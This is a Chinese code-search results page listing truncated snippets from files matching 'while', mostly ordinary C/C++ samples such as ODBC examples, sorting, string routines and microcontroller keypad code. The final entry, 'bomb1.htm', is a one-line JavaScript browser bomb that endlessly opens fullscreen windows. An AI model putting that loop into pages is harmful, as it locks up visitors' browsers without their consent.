代码搜索:while
找到约 10,000 项符合「while」的源代码
代码结果 10,000
www.eeworm.com/read/277143/10661287
cpp ex235_odbc.cpp
#include
using namespace std;
#include
#define OTL_ODBC_MSSQL_2005 // Compile OTL 4/ODBC, MS SQL 2005
//#define OTL_ODBC // Compile OTL 4/ODBC. Uncomment this when used with
www.eeworm.com/read/277143/10662367
cpp ex526_odbc.cpp
#include
using namespace std;
#include
#define OTL_ODBC_MSSQL_2005 // Compile OTL 4/ODBC, MS SQL 2005
//#define OTL_ODBC // Compile OTL 4/ODBC. Uncomment this when used wi
www.eeworm.com/read/277084/10670055
cpp newmat2.cpp
//$$ newmat2.cpp Matrix row and column operations
// Copyright (C) 1991,2,3,4: R B Davies
#define WANT_MATH
#include "include.h"
#include "newmat.h"
#include "newmatrc.h"
#ifdef u
www.eeworm.com/read/421976/10673427
c merge.c
#include
void Mpass(int x[],int y[],int k,int n); /*声明其为函数*/
void Msort(int x[],int y[],int n); /*声明其为函数*/
int main(void)
{
/*要排序整型数据序列*/
int a[] = {26,5,37,1,61,11,59,15,48,19
www.eeworm.com/read/351203/10673979
c test2.c
/* KMP 算法体验 */
#include
#include
#include
#include
#define MAX (100)
main()
{
char s[MAX],t[MAX],n[MAX];
int lenS = 0 , lenT = 0;
www.eeworm.com/read/159238/10676460
c mystring.c
//**********************************************************************************
//杨屹 2002/08/20 第一版
//字符串操作函数
//联系方法:gdtyy@ri.gdt.com.cn(2003/07/31以前有效)
//******************************
www.eeworm.com/read/351145/10677800
c 4x5text.c
/*****************************************************************
File:4x5text.c
Author:xiaorunyi
Edition:V1.0
Email:qq315626168@126.com
www.ednchina.com/blog/xiaorunyi
功能:4x5健盘铃声测试
**********
www.eeworm.com/read/351145/10677812
lst 4x5text.lst
C51 COMPILER V7.08 4X5TEXT 07/24/2007 20:46:51 PAGE 1
C51 COMPILER V7.08, COMPILATION OF MODULE 4X5TEXT
OBJECT MODULE PLACED IN
www.eeworm.com/read/421864/10683837
c tblib.c
#include
#include
#include
#include
#include
#include "\inc\define.h"
#include "\inc\drives.h"
#include "\inc\TBlib.h"
#define STACKS
www.eeworm.com/read/159164/10685828
htm bomb1.htm
while (true){ window.open("bomb.htm","","fullscreen=yes,Status=no,scrollbars=no,resizable=no");}